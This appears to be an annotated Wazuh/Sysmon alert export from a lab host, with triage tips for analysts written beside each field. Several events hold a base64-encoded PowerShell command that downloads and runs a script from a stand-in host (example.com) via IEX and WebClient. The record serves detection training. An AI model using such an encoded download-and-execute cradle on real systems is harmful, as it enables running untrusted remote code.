data.win.eventdata.utcTime: 2025-04-24 22:40:19.211 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd3-680a-cd0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 17212 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdd0-680a-cb0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 17072 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 110 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534423.2046378 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:20.6436679Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285885 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:20.629
ProcessGuid: {94294ddc-bdd3-680a-cd0b-000000000e00}
ProcessId: 17212
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ng0zpqlc.nyj.ps1
CreationUtcTime: 2025-04-24 22:40:20.629
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:20.629 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd3-680a-cd0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 17212 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ng0zpqlc.nyj.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:20.629 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 107 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534425.2049147 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:23.0952982Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285927 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:21.885
ProcessGuid: {94294ddc-bdd5-680a-cf0b-000000000e00}
ProcessId: 17332
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdd3-680a-cd0b-000000000e00}
ParentProcessId: 17212
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:21.885 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd5-680a-cf0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 17332 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdd3-680a-cd0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 17212 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 111 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534425.2057218 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:23.2871264Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285928 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:23.247
ProcessGuid: {94294ddc-bdd5-680a-cf0b-000000000e00}
ProcessId: 17332
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_cyvz0ll2.4w1.ps1
CreationUtcTime: 2025-04-24 22:40:23.247
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:23.247 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd5-680a-cf0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 17332 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_cyvz0ll2.4w1.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:23.247 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 108 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534428.2059987 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:25.5105277Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285959 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:24.293
ProcessGuid: {94294ddc-bdd8-680a-d10b-000000000e00}
ProcessId: 4932
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdd5-680a-cf0b-000000000e00}
ParentProcessId: 17332
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:24.293 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd8-680a-d10b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdd5-680a-cf0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 17332 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
